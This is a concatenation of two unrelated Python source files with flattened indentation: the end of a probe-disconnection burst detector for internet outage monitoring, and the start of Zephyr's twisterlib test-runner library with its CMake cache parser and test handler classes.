for iter in range(0, len(masterProbeLocList) - 1):
id, lat, lon = masterProbeLocList[iter]
for iter2 in range(iter + 1, len(masterProbeLocList)):
id2, lat2, lon2 = masterProbeLocList[iter2]
dist = haversine(lon, lat, lon2, lat2)
if dist <= probeClusterDistanceThreshold:
prKey = 'pid-' + str(id)
if prKey not in probeIDFilterByDistance.keys():
probeIDFilterByDistance[prKey] = set()
probeIDFilterByDistance[prKey].add(id)
probeIDFilterByDistance[prKey].add(id2)
# Add unique sets to main dict
ignoreID = []
for prbID, prbSet in probeIDFilterByDistance.items():
if prbID in ignoreID:
continue
redundantSet = False
for prbID2, prbSet2 in probeIDFilterByDistance.items():
if prbID != prbID2:
if prbSet == prbSet2:
ignoreID.append(prbID2)
if prbID not in signalMapCountries.keys():
signalMapCountries[prbID] = set()
signalMapCountries[prbID] = prbSet
logging.info('Events from {0} probes observed'.format(len(seenProbes)))
return signalMapCountries
def applyBurstThreshold(burstsDict, eventsList):
thresholdedEvents = []
for event in eventsList:
insertFlag = False
for state, timeDictList in burstsDict.items():
if state >= BURST_THRESHOLD:
for timeDict in timeDictList:
if float(event['timestamp']) >= timeDict['start'] and float(event['timestamp']) <= timeDict['end']:
insertFlag = True
if insertFlag:
thresholdedEvents.append(event)
return thresholdedEvents
def getFilteredEvents(eventLocal):
interestingEvents = []
for event in eventLocal:
sys.stdout.flush()
try:
if event['prb_id'] in selectedProbeIds:
interestingEvents.append(event)
except:
traceback.print_exc()
logging.error('Error in selecting interesting events')
return interestingEvents
def groupByProbeID(eventsList):
probeIDDict = {}
for evt in eventsList:
prbID = evt['prb_id']
if prbID not in probeIDDict.keys():
probeIDDict[prbID] = 1
else:
probeIDDict[prbID] += 1
return probeIDDict
def groupByASN(eventsList):
ASNDict = {}
for evt in eventsList:
if evt['asn']:
asn = int(evt['asn'])
insertBool = True
if asnFilterEnabled:
if asn not in filterDict['asn']:
insertBool = False
if insertBool:
if asn not in ASNDict.keys():
ASNDict[asn] = set()
ASNDict[asn].add(evt['prb_id'])
filteredASNDict = {}
impactVals = []
noInfoASNs = []
for k, v in ASNDict.items():
try:
impactVals.append(float(len(v)) / float(len(probeInfo.asnToProbeIDDict[k])))
except KeyError:
logging.warning('Key {0} not found'.format(k))
noInfoASNs.append(k)
continue
avgImapct = np.average(impactVals) / 3
# print(noInfoASNs)
avgImapct = 0
logging.info('Threshold Average Impact is {0}.'.format(avgImapct))
for k, v in ASNDict.items():
try:
if k not in noInfoASNs:
numProbesASOwns = len(probeInfo.asnToProbeIDDict[k])
if numProbesASOwns > 5:
numProbesInASDisconnected = len(v)
asnImpact = float(numProbesInASDisconnected) / float(numProbesASOwns)
if asnImpact > 1:
# print('Abnormal AS',k,numProbesInASDisconnected,numProbesASOwns)
asnImpact = 1
# print(float(len(v)),float(len(asnToProbeIDDict[k])))
# print(asnImpact,avgImapct)
if asnImpact >= avgImapct:
filteredASNDict[k] = asnImpact
except KeyError:
logging.error('Key {0} not found'.format(k))
print('Key {0} not found'.format(k))
exit(1)
return filteredASNDict
def groupByCountry(eventsList):
probeIDToCountryDict = probeInfo.probeIDToCountryDict
CountryDict = {}
for evt in eventsList:
id = evt['prb_id']
if id in probeIDToCountryDict.keys():
insertBool = True
if countryFilterEnabled:
if probeIDToCountryDict[id] not in filterDict['country_code']:
insertBool = False
if insertBool:
if probeIDToCountryDict[id] not in CountryDict.keys():
CountryDict[probeIDToCountryDict[id]] = 1
else:
CountryDict[probeIDToCountryDict[id]] += 1
else:
# x=1
# if evt['event']=='connect':
logging.warning('No mapping found for probe ID {0}'.format(id))
return CountryDict
def kleinberg(data, probesInUnit=1, timeRange=8640000, verbose=5):
ts = np.array(data)
bursts = pybursts.kleinberg(ts, s=s, T=timeRange, n=probesInUnit * nScalar, gamma=gamma)
return bursts
def getData(dataFile):
try:
data = json.load(gzip.open(dataFile))
for event in data:
try:
dataList.append(event)
if DETECT_DISCO_BURST:
if event["event"] == "disconnect":
dataQueueDisconnect.put(event)
if DETECT_CON_BURST:
if event["event"] == "connect":
dataQueueConnect.put(event)
except KeyError:
pass
except:
traceback.print_exc()
def getBurstEventIDDict(burstDict):
burstEventDict = {}
burstEventID = 1
for state, timeDictList in burstDict.items():
if state == BURST_THRESHOLD:
for timeDict in timeDictList:
burstEventDict[burstEventID] = {'start': timeDict['start'], 'end': timeDict['end']}
burstEventID += 1
return burstEventDict
def getEventID(burstEventDict, event):
eventID = None
for eID, times in burstEventDict.items():
if float(event['timestamp']) >= times['start'] and float(event['timestamp']) <= times['end']:
eventID = eID
break
return eventID
def haversine(lon1, lat1, lon2, lat2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees)
"""
try:
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = np.sin(dlat / 2) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2) ** 2
c = 2 * np.arcsin(np.sqrt(a))
km = 6367 * c
return km
except:
print(lon1, lat1, lon2, lat2)
traceback.print_exc()
def getPerEventStats(burstyProbeDurations,burstyProbeDurationsOngoing,numProbesInUnit,output,key):
burstEventInfo=[]
for id,inDict in burstyProbeDurations.items():
startTimes=[]
endTimes=[]
durations=[]
probeIds=[]
for pid,inDict2 in inDict.items():
try:
addrv4 = probeInfo.probeIDToAddrv4Dict[pid]
except:
continue
if addrv4 == 'None':
continue
maxState=max(inDict2.keys())
for infoDict in inDict2[maxState]:
startTimes.append(infoDict["disconnect"])
endTimes.append(infoDict["connect"])
durations.append(infoDict["duration"])
slash24vals = addrv4.split('.')
slash24 = slash24vals[0]+'.'+slash24vals[1]+'.'+slash24vals[2]+'.0/24'
probeIds.append({'probeID':pid,'slash24':slash24,'state':maxState,"start":infoDict["disconnect"],"end":infoDict["connect"]})
startMedian=np.median(np.array(startTimes))
endMedian=np.median(np.array(endTimes))
durationMedian=np.median(np.array(durations))
burstEventInfo.append([id,startMedian,endMedian,durationMedian,numProbesInUnit,probeIds])
output.write([id,key,startMedian,endMedian,durationMedian,numProbesInUnit,probeIds],output_format=output_format)
'''
for id,inDict in burstyProbeDurationsOngoing.items():
startTimes=[]
probeIds=[]
for pid,inDict2 in inDict.items():
maxState=max(inDict2.keys())
for infoDict in inDict2[maxState]:
startTimes.append(infoDict["disconnect"])
probeIds.append({'probeID':pid,'state':maxState,"start":infoDict["disconnect"],"end":-1})
startMedian=np.median(np.array(startTimes))
burstEventInfo.append([id,startMedian,-1,-1,numProbesInUnit,probeIds])
#output.write([id,startMedian,endMedian,durationMedian,numProbesInUnit,probeIds])
'''
return burstEventInfo
def workerThread(threadType):
intConCountryDict = {}
intConControllerDict = {}
intConASNDict = {}
intConProbeIDDict = {}
global numSelectedProbesInUnit # Probes after user filter
global READ_OK
global dataTimeRangeInSeconds
numProbesInUnit = 0
pendingEvents = collections.deque(maxlen=200000)
while True:
eventLocal = []
filesToEmail = []
if not READ_OK:
while not READ_OK:
time.sleep(WAIT_TIME)
else:
time.sleep(WAIT_TIME)
lastQueuedTimestamp = int((datetime.utcnow() - datetime.utcfromtimestamp(0)).total_seconds())
if threadType == 'con':
itemsToRead = dataQueueConnect.qsize()
elif threadType == 'dis':
itemsToRead = dataQueueDisconnect.qsize()
else:
print('Unknown thread type!')
exit(1)
allPrevTS = set()
for eves in pendingEvents:
allPrevTS.add(eves['timestamp'])
eventLocal.append(eves)
itrFromThread = itemsToRead
itr2 = itrFromThread + len(eventLocal)
prevEvs = itr2 - itrFromThread
try:
if prevEvs > 0:
microSecAddFactor = (lastQueuedTimestamp - min(allPrevTS)) * 100
dataTimeRangeInSeconds += microSecAddFactor
except:
traceback.print_exc()
logging.info('Events Info - Current:{0} Previous:{1} Total:{2}'.format(itemsToRead, prevEvs, itr2))
if itr2 > 1:
if itemsToRead > 1:
while itemsToRead:
if threadType == 'con':
event = dataQueueConnect.get()
else:
event = dataQueueDisconnect.get()
eventLocal.append(event)
itemsToRead -= 1
interestingEvents = getFilteredEvents(eventLocal)
if len(interestingEvents) < 1:
for iter in range(0, itrFromThread):
if threadType == 'con':
dataQueueConnect.task_done()
else:
dataQueueDisconnect.task_done()
continue
dataDate = datetime.utcfromtimestamp(interestingEvents[0]["timestamp"]).strftime('%Y%m%d')
signalMapCountries = getUniqueSignalInEvents(interestingEvents)
# Manage duplicate values
for key, probeIDSet in signalMapCountries.items():
numProbesInUnit = 0
asnKey = False
countryKey = False
probeKey = False
allKey = False
if not SPLIT_SIGNAL:
if key != 'All':
continue
try:
asn = int(key)
numProbesInUnit = len(probeInfo.asnToProbeIDDict[asn])
asnKey = True
except:
try:
if key == 'All':
numProbesInUnit = numSelectedProbesInUnit
allKey = True
else:
if 'pid' in key:
numProbesInUnit = len(probeIDSet)
probeKey = True
else:
numProbesInUnit = len(probeInfo.countryToProbeIDDict[key])
countryKey = True
except:
logging.error('Error in getting number of probes in unit for key: {0}'.format(key))
print('Error in getting number of probes in unit for key: {0}'.format(key))
continue
if numProbesInUnit < MIN_PROBES:
continue
timestampDict = {}
eventClean = []
tsClean = []
probesInFilteredData = set()
for eventVal in interestingEvents:
pID = int(eventVal['prb_id'])
asn = None
try:
asn = int(eventVal['asn'])
except:
pass
if (asnKey and key == asn) or (countryKey and key == probeInfo.probeIDToCountryDict[pID]) or (
probeKey and int(key.split('-')[1]) in probeIDSet) or allKey:
if pID in probeIDSet:
tStamp = float(eventVal['timestamp'])
eventVal['timestamp'] = tStamp
if tStamp not in timestampDict.keys():
timestampDict[tStamp] = 1
else:
timestampDict[tStamp] += 1
eventClean.append(eventVal)
probesInFilteredData.add(pID)
for tStamp, numOfRep in timestampDict.items():
for gr in range(0, numOfRep):
tsClean.append((tStamp) + (gr / numOfRep))
if len(tsClean) < SIGNAL_LENGTH:
continue
tsClean.sort()
balancedNumProbes = int(numProbesInUnit * (dataTimeRangeInSeconds / 8640000))
if balancedNumProbes == 0:
balancedNumProbes = 1
bursts = kleinberg(tsClean, timeRange=dataTimeRangeInSeconds, probesInUnit=balancedNumProbes)
burstsDict = {}
for brt in bursts:
q = brt[0]
qstart = brt[1]
qend = brt[2]
if q not in burstsDict.keys():
burstsDict[q] = []
tmpDict = {'start': float(qstart), 'end': float(qend)}
burstsDict[q].append(tmpDict)
thresholdedEvents = applyBurstThreshold(burstsDict, eventClean)
logging.info('Number of thresholded events: ' + str(len(thresholdedEvents)) + ' for key: ' + str(key))
if len(thresholdedEvents) > 0:
intConProbeIDDict = groupByProbeID(thresholdedEvents)
if threadType == 'dis':
burstyProbeIDs = intConProbeIDDict.keys()
burstEventDict = getBurstEventIDDict(burstsDict)
burstyProbeInfoDict = getTimeStampsForBurstyProbes(burstyProbeIDs, burstsDict, burstEventDict)
burstyProbeDurationsOngoing, burstyProbeDurations = correlateWithConnectionEvents(
burstyProbeInfoDict)
# Probes that had corresponding connect events
probesWhichGotConnected = []
for _, inDict in burstyProbeDurations.items():
for pid, _ in inDict.items():
probesWhichGotConnected.append(pid)
probesWhichDidntConnect = []
for everyPr in burstyProbeIDs:
if everyPr not in probesWhichGotConnected:
probesWhichDidntConnect.append(everyPr)
# Calculate new pending events
newPendingEvents = []
for event in eventClean:
try:
if event['prb_id'] in probesWhichDidntConnect:
newPendingEvents.append(event)
except:
traceback.print_exc()
logging.error('Error in selecting interesting events')
pendingEvents = newPendingEvents
output = outputWriter(
resultfilename='results/disco_events_' + dataDate + '_' + str(key) + '.txt')
if len(burstyProbeDurations) > 0:
filesToEmail.append(output)
logging.info('Burst was seen, call made to events stats.')
burstEventInfo = getPerEventStats(burstyProbeDurations, burstyProbeDurationsOngoing,
numProbesInUnit, output, key)
for iter in range(0, itrFromThread):
try:
# print('Task Done: {0} {1}'.format(iter,itrFromThread))
sys.stdout.flush()
if threadType == 'con':
dataQueueConnect.task_done()
else:
dataQueueDisconnect.task_done()
except ValueError:
pass
else:
for iter in range(0, itrFromThread):
try:
if threadType == 'con':
eve = dataQueueConnect.get()
dataQueueConnect.task_done()
else:
eve = dataQueueDisconnect.get()
dataQueueDisconnect.task_done()
except ValueError:
pass
if __name__ == "__main__":
configfile = 'conf/disco.conf'
config = configparser.ConfigParser()
try:
config.sections()
config.read(configfile)
except:
logging.error('Missing config: ' + configfile)
exit(1)
try:
READ_ONILNE = eval(config['RUN_PARAMS']['readStream'])
BURST_THRESHOLD = int(config['RUN_PARAMS']['burstLevelThreshold'])
SIGNAL_LENGTH = int(config['RUN_PARAMS']['minimumSignalLength'])
MIN_PROBES = int(config['RUN_PARAMS']['minimumProbesInUnit'])
WAIT_TIME = int(config['RUN_PARAMS']['waitTime'])
DETECT_DISCO_BURST = eval(config['RUN_PARAMS']['detectDisconnectBurst'])
DETECT_CON_BURST = eval(config['RUN_PARAMS']['detectConnectBurst'])
dataYear = config['RUN_PARAMS']['dataYear']
logLevel = config['RUN_PARAMS']['logLevel'].upper()
fastLoadProbeInfo = eval(config['RUN_PARAMS']['fastLoadProbeInfo'])
SPLIT_SIGNAL = eval(config['FILTERS']['splitSignal'])
gamma = float(config['KLEINBERG']['gamma'])
s = float(config['KLEINBERG']['s'])
nScalar = float(config['KLEINBERG']['nScalar'])
output_format = str(config['OUTPUT']['format'])
except:
print('Incorrect or missing parameter(s) in config file!')
exit(1)
logging.basicConfig(filename='logs/{0}.log'.format(os.path.basename(sys.argv[0]).split('.')[0]), level=logLevel, \
format='[%(asctime)s] [%(levelname)s] %(message)s', datefmt='%m-%d-%Y %I:%M:%S')
logging.info('---Disco Live Initialized---')
logging.info('Using conf file {0}'.format(configfile))
global dataQueueDisconnect
global dataQueueConnect
# Probe Enrichment Info
probeInfo = probeEnrichInfo(dataYear=dataYear)
logging.info('Loading Probe Enrichment Info from {0}'.format(dataYear))
if fastLoadProbeInfo:
probeInfo.fastLoadInfo()
else:
probeInfo.loadInfoFromFiles()
if SIGNAL_LENGTH < 2:
logging.warning('User given signal length too low, using minimum signal length 2.')
SIGNAL_LENGTH = 2 # Minimum 2 to detect burst
# Read filters and prepare a set of valid probe IDs
filterDict = eval(config['FILTERS']['filterDict'])
probeClusterDistanceThreshold = int(config['FILTERS']['probeClusterDistanceThreshold'])
numSelectedProbesInUnit = None
asnFilterEnabled = False
countryFilterEnabled = False
selectedProbeIdsASN = set()
selectedProbeIdsCountry = set()
for filterType in filterDict.keys():
if filterType == 'asn':
asnFilterEnabled = True
for val in filterDict[filterType]:
filterValue = int(val)
try:
for id in probeInfo.asnToProbeIDDict[filterValue]:
selectedProbeIdsASN.add(id)
except KeyError:
pass
elif filterType == 'country_code':
countryFilterEnabled = True
for val in filterDict[filterType]:
filterValue = val
try:
for id in probeInfo.countryToProbeIDDict[filterValue]:
selectedProbeIdsCountry.add(id)
except KeyError:
pass
elif filterType == 'pid':
countryFilterEnabled = True
for val in filterDict[filterType]:
pid1 = int(val)
try:
probelDict = probeInfo.probeIDToLocDict[pid1]
lat = probelDict['lat']
lon = probelDict['lon']
for prD, probelDictIn in probeInfo.probeIDToLocDict.items():
lat2 = probelDictIn['lat']
lon2 = probelDictIn['lon']
dist = haversine(lon, lat, lon2, lat2)
if dist <= probeClusterDistanceThreshold:
selectedProbeIdsCountry.add(prD)
except KeyError:
pass
selectedProbeIds = set()
if asnFilterEnabled and countryFilterEnabled:
selectedProbeIds = selectedProbeIdsASN.intersection(selectedProbeIdsCountry)
elif asnFilterEnabled:
selectedProbeIds = selectedProbeIdsASN
elif countryFilterEnabled:
selectedProbeIds = selectedProbeIdsCountry
if asnFilterEnabled or countryFilterEnabled:
logging.info('Filter {0} has {1} probes.'.format(filterDict, len(selectedProbeIds)))
else:
logging.info('No filter given, will use all probes')
selectedProbeIds = set(probeInfo.probeIDToCountryDict.keys())
numSelectedProbesInUnit = len(selectedProbeIds)
logging.info('Number of probes selected: {0}'.format(numSelectedProbesInUnit))
# print('Number of probes selected: {0}'.format(numProbesInUnit))
dataFile = None
dataTimeRangeInSeconds = None
# Variable to control when thread starts reading the data queue
READ_OK = True
if not READ_ONILNE:
try:
dataFile = sys.argv[1]
if os.path.isfile(dataFile) or dataFile is None:
if '_' not in dataFile:
logging.error('Name of data file does not meet requirement. Should contain "_".')
exit(1)
# print(dataTimeRangeInSeconds)
except:
logging.warning('Input parameter error, switching back to reading online stream.')
READ_ONILNE = True
ts = []
dataQueueDisconnect = Queue.Queue()
dataQueueConnect = Queue.Queue()
# dataList=[]
dataList = collections.deque(maxlen=200000)
pp = PrettyPrinter()
# Launch threads
if DETECT_DISCO_BURST:
for i in range(0, 1):
t = threading.Thread(target=workerThread, args=('dis',))
t.daemon = True
t.start()
if DETECT_CON_BURST:
for i in range(0, 1):
t = threading.Thread(target=workerThread, args=('con',))
t.daemon = True
t.start()
if READ_ONILNE:
if WAIT_TIME < 60:
logging.info('Thread wait time was too low, updated to 60 seconds.')
WAIT_TIME = 60
dataTimeRangeInSeconds = int(WAIT_TIME) * 100
logging.info('Reading Online with wait time {0} seconds.'.format(WAIT_TIME))
getLiveRestAPI()
dataQueueDisconnect.join()
dataQueueConnect.join()
else:
try:
eventFiles = []
if os.path.isdir(dataFile):
# eventFiles = [join(dataFile, f) for f in listdir(dataFile) if isfile(join(dataFile, f))]
for dp, dn, files in os.walk(dataFile):
for name in files:
eventFiles.append(os.path.join(dp, name))
else:
eventFiles.append(dataFile)
eventFiles = sorted(eventFiles)
for file in eventFiles:
if file.endswith('.gz'):
logging.info('Processing {0}'.format(file))
dataQueueDisconnect = Queue.Queue()
dataQueueConnect = Queue.Queue()
WAIT_TIME = 1
try:
dataTimeRangeInSeconds = int(eval(sys.argv[2])) * 100
except:
dataTimeRangeInSeconds = 8640000
# Make sure threads wait till the entire file is read
READ_OK = False
getData(file)
READ_OK = True
logging.info('Waiting for threads to finishing processing events.')
dataQueueDisconnect.join()
dataQueueConnect.join()
else:
logging.info('Ignoring file {0}, its not of correct format.'.format(file))
except:
logging.error('Error in reading file.')
raise Exception('Error in reading file.')
logging.info('---Disco Live Stopped---')
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def add_missing_testscases(self, harness):
"""
If testsuite was broken by some error (e.g. timeout) it is necessary to
add information about next testcases, which were not be
performed due to this error.
"""
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
def _set_skip_reason(self, harness_state):
"""
If testcase written in ztest framework is skipped by "ztest_test_skip()"
function, then such testcase is marked in instance.results dict as
"SKIP", but reason of this sipping still "Unknown". This method pick up
this situation and complete the instance.reason properly.
"""
harness_state_pass = "passed"
harness_testcase_result_skip = "SKIP"
instance_reason_unknown = "Unknown"
if harness_state == harness_state_pass and \
self.instance.reason == instance_reason_unknown and \
harness_testcase_result_skip in self.instance.results.values():
self.instance.reason = "ztest skip"
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
If test suite names was found in test's C source code, then verify if
detected suite names from output correspond to expected suite names
(and not in reverse).
"""
expected_suite_names = self.instance.testcase.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
Change result of performed test if problem with missing or unpropper
suite name was occurred.
"""
self.set_state("failed", handler_time)
for k in self.instance.testcase.cases:
self.instance.results[k] = "FAIL"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
self._set_skip_reason(harness.state)
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.set_state("failed", handler_time)
self.instance.reason = "RunID mismatch"
for k in self.instance.testcase.cases:
self.instance.results[k] = "FAIL"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
